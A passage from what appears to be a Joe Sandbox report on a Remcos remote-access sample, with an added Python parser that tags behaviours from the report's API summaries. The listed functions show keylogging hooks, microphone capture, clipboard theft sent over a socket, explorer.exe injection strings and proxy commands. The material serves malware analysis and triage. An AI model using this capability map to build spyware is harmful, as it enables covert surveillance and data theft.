                                • Opcode Fuzzy Hash: 34f8705e0c0f93922566264f33deac87a441625c0d7611431a9fca3829c404f1
                                • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                Uniqueness

                                Uniqueness Score: -1.00%
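                                 The three function summaries just above (clipboard read followed by a WS2_32 send in a subcall, a ControlService call with control code 1, and enumeration of HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall for DisplayName) are the blocks an analyst wants pulled out of a report this long. The following is an added example, not part of the Joe Sandbox report or its tooling: a Python parser for these summary blocks that records each API call with its reconstructed arguments and tags the behaviour the API pattern implies. The sample input is a constructed excerpt of the three blocks above; the tagging rules, the tag names and the constant values used (CF_UNICODETEXT = 0x0D, SERVICE_CONTROL_STOP = 1, HKEY_LOCAL_MACHINE = 0x80000002) are my own choices, not something the report states.

```python
"""Parse the per-function summary blocks of a Joe Sandbox report ('APIs', 'Strings',
'Similarity', 'Uniqueness Score') and tag the behaviour each function's API set implies.
Added triage helper; this is not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

# "• GetClipboardData.USER32(0000000D), ref: 0041696C" and the indented
# "• Part of subcall function 00404AA1: send.WS2_32(?,...), ref: 00404B36" form
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s+)?(?P<api>[A-Za-z_]\w*)"
    r"\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})$")
STR_RE = re.compile(r"^•\s+(?P<text>.*), xrefs?: (?P<ref>[0-9A-F]{8})$")   # "• DisplayName, xrefs: ..."
KV_RE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+ (?:ID|Hash)):\s*(?P<val>.*)$")  # "• API ID: ..."
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity", "Uniqueness"}
# Windows SDK constants the rules key on, written as the report prints them (assumed values)
CF_UNICODETEXT, SERVICE_CONTROL_STOP, HKEY_LOCAL_MACHINE = "0000000D", "00000001", "80000002"


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str
    subcall_of: str = ""  # callee address when the report lists the call under a subcall


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, xref address)
    meta: dict = field(default_factory=dict)     # Similarity keys plus 'uniqueness'

    def entry(self):
        """Lowest ref address among direct calls: a stable handle for the function."""
        direct = [c.ref for c in self.calls if not c.subcall_of]
        return min(direct) if direct else None


def parse_blocks(text):
    """Split report text into FunctionBlocks; a block ends at its 'Uniqueness Score' line."""
    blocks, cur, section = [], FunctionBlock(), None
    for line in (ln.strip() for ln in text.splitlines()):
        if line.startswith("Uniqueness Score:"):
            cur.meta["uniqueness"] = line.split(":", 1)[1].strip()
            blocks.append(cur)
            cur, section = FunctionBlock(), None
        elif line in SECTIONS:
            section = line
        elif section == "APIs" and (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] is not None else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"] or ""))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append((m["text"], m["ref"]))
        elif section == "Similarity" and (m := KV_RE.match(line)):
            cur.meta[m["key"]] = m["val"].strip()
    return blocks


def capabilities(block):
    """Map one function's API pattern onto the behaviour it implies. Only leading arguments
    are trusted: the IDA plugin reconstructs them from the stack, so later slots are often '?'."""
    calls = {c.api: c for c in block.calls}
    tags = set()
    if "OpenClipboard" in calls and "GetClipboardData" in calls:
        unicode_text = calls["GetClipboardData"].args[:1] == [CF_UNICODETEXT]
        tags.add("clipboard-read" + ("-unicode-text" if unicode_text else ""))
    if "send" in calls:  # direct or via a subcall: the collected data leaves over a socket
        tags.add("network-send")
    if "ControlService" in calls and calls["ControlService"].args[1:2] == [SERVICE_CONTROL_STOP]:
        tags.add("service-stop")
    if "RegOpenKeyExA" in calls and "RegEnumKeyExA" in calls:
        a = calls["RegOpenKeyExA"].args
        if a[:1] == [HKEY_LOCAL_MACHINE] and any(x.endswith("\\Uninstall") for x in a):
            tags.add("installed-software-enum")
    return tags


def triage(text):
    """One (entry address, API ID, sorted tags) row per function in the report text."""
    return [(b.entry(), b.meta.get("API ID", ""), sorted(capabilities(b))) for b in parse_blocks(text)]


# Constructed excerpt of the clipboard, service-control and Uninstall-key functions above.
SAMPLE = r"""
APIs
• OpenClipboard.USER32 ref: 00416941
• GetClipboardData.USER32(0000000D), ref: 0041696C
• CloseClipboard.USER32 ref: 00416984
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Similarity
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
Uniqueness Score: -1.00%
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001), ref: 0041AB1C
• ControlService.ADVAPI32(00000000,00000001,?), ref: 0041AB4F
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
Uniqueness Score: -1.00%
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
Strings
• DisplayName, xrefs: 0041C73C
Uniqueness Score: -1.00%
"""
```

Run `triage(SAMPLE)` on the constructed excerpt, or on the text of a whole report saved from the "Similarity" view, to get one row per function. The rules deliberately key only on leading argument positions: the argument lists in these summaries are stack reconstructions, so the trailing "?" entries and values that repeat across unrelated calls (the 0041A486 return address in the service block, for instance) are not evidence of anything and should not drive a tag.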

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Eventinet_ntoa
                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                • API String ID: 3578746661-3604713145
                                • Opcode ID: ab18085dfb9070501b6a617d13a9934c7a772270e49a3b63cf56808473da2604
                                • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                • Opcode Fuzzy Hash: ab18085dfb9070501b6a617d13a9934c7a772270e49a3b63cf56808473da2604
                                • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                • __fassign.LIBCMT ref: 0044B479
                                • __fassign.LIBCMT ref: 0044B494
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID: PkGNG
                                • API String ID: 1324828854-263838557
                                • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                • ExitThread.KERNEL32 ref: 004018F6
                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                • String ID: 0jU$PkG$XMG$NG$NG
                                • API String ID: 1649129571-2736300130
                                • Opcode ID: a9a7ce0a0b90b44db80bc4e59ffcd89cd879969cdb5479c222021ee2e07a9105
                                • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                • Opcode Fuzzy Hash: a9a7ce0a0b90b44db80bc4e59ffcd89cd879969cdb5479c222021ee2e07a9105
                                • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • Sleep.KERNEL32(00000064), ref: 00417521
                                • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                Strings
                                Yara matches
                                Similarity
                                • API ID: File$CreateDeleteExecuteShellSleep
                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                • API String ID: 1462127192-2001430897
                                • Opcode ID: f10e294ee6a8c27b1349ad3ce0c7058653f24f1ec6cf567e6a5304385f617d5d
                                • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                • Opcode Fuzzy Hash: f10e294ee6a8c27b1349ad3ce0c7058653f24f1ec6cf567e6a5304385f617d5d
                                • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\AppData\Roaming\microsofts\svcs.exe), ref: 0040749E
                                Strings
                                Yara matches
                                Similarity
                                • API ID: CurrentProcess
                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                • API String ID: 2050909247-4242073005
                                • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                • waveInStart.WINMM ref: 00401CFE
                                Strings
                                Yara matches
                                Similarity
                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                • String ID: dMG$|MG$PG
                                • API String ID: 1356121797-532278878
                                • Opcode ID: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                • Opcode Fuzzy Hash: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                  • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                  • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                  • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                • TranslateMessage.USER32(?), ref: 0041D4E9
                                • DispatchMessageA.USER32(?), ref: 0041D4F3
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                • String ID: Remcos
                                • API String ID: 1970332568-165870891
                                • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • _memcmp.LIBVCRUNTIME ref: 00445423
                                • _free.LIBCMT ref: 00445494
                                • _free.LIBCMT ref: 004454AD
                                • _free.LIBCMT ref: 004454DF
                                • _free.LIBCMT ref: 004454E8
                                • _free.LIBCMT ref: 004454F4
                                Strings
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast$_abort_memcmp
                                • String ID: C
                                • API String ID: 1679612858-1037565863
                                • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tcp$udp
                                • API String ID: 0-3725065008
                                • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000), ref: 00404BC3
                                Strings
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                • String ID: .part
                                • API String ID: 1303771098-3499674018
                                • Opcode ID: e279c082a0d0910cbf5de12e36227e1aa9d15681696cbfcdd7b3720dc44f8cc2
                                • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                • Opcode Fuzzy Hash: e279c082a0d0910cbf5de12e36227e1aa9d15681696cbfcdd7b3720dc44f8cc2
                                • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                • GetLastError.KERNEL32 ref: 0040A2ED
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                • TranslateMessage.USER32(?), ref: 0040A34A
                                • DispatchMessageA.USER32(?), ref: 0040A355
                                Strings
                                • Keylogger initialization failure: error , xrefs: 0040A301
                                Yara matches
                                Similarity
                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                • String ID: Keylogger initialization failure: error
                                • API String ID: 3219506041-952744263
                                • Opcode ID: a226280b9444fdc9d85a987e0cc9a01563434beb77e8bedbb690ae4a652fbc74
                                • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                • Opcode Fuzzy Hash: a226280b9444fdc9d85a987e0cc9a01563434beb77e8bedbb690ae4a652fbc74
                                • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetForegroundWindow.USER32 ref: 0040A416
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                • GetKeyState.USER32(00000010), ref: 0040A433
                                • GetKeyboardState.USER32(?), ref: 0040A43E
                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                Yara matches
                                Similarity
                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                • String ID:
                                • API String ID: 1888522110-0
                                • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                Yara matches
                                Similarity
                                • API ID: InputSend
                                • String ID:
                                • API String ID: 3431551938-0
                                • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Yara matches
                                Similarity
                                • API ID: __freea$__alloca_probe_16_free
                                • String ID: a/p$am/pm$zD
                                • API String ID: 2936374016-2723203690
                                • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 00449212
                                • _free.LIBCMT ref: 00449236
                                • _free.LIBCMT ref: 004493BD
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                • String ID:
                                • API String ID: 314583886-0
                                • Opcode ID: a76c1c50f6247d6f477dd4f5516cace97548eaaec76019f05838640eec6fad56
                                • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                • Opcode Fuzzy Hash: a76c1c50f6247d6f477dd4f5516cace97548eaaec76019f05838640eec6fad56
                                • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Enum$InfoQueryValue
                                • String ID: [regsplt]$xUG$TG
                                • API String ID: 3554306468-1165877943
                                • Opcode ID: 93e1897ebdc99b88186db92230c2e95498abfdd16b02543cd39a55fa0a109888
                                • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                • Opcode Fuzzy Hash: 93e1897ebdc99b88186db92230c2e95498abfdd16b02543cd39a55fa0a109888
                                • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                • __alloca_probe_16.LIBCMT ref: 004511B1
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                                • __freea.LIBCMT ref: 0045121D
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                • String ID: PkGNG
                                • API String ID: 313313983-263838557
                                • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                  • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                  • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
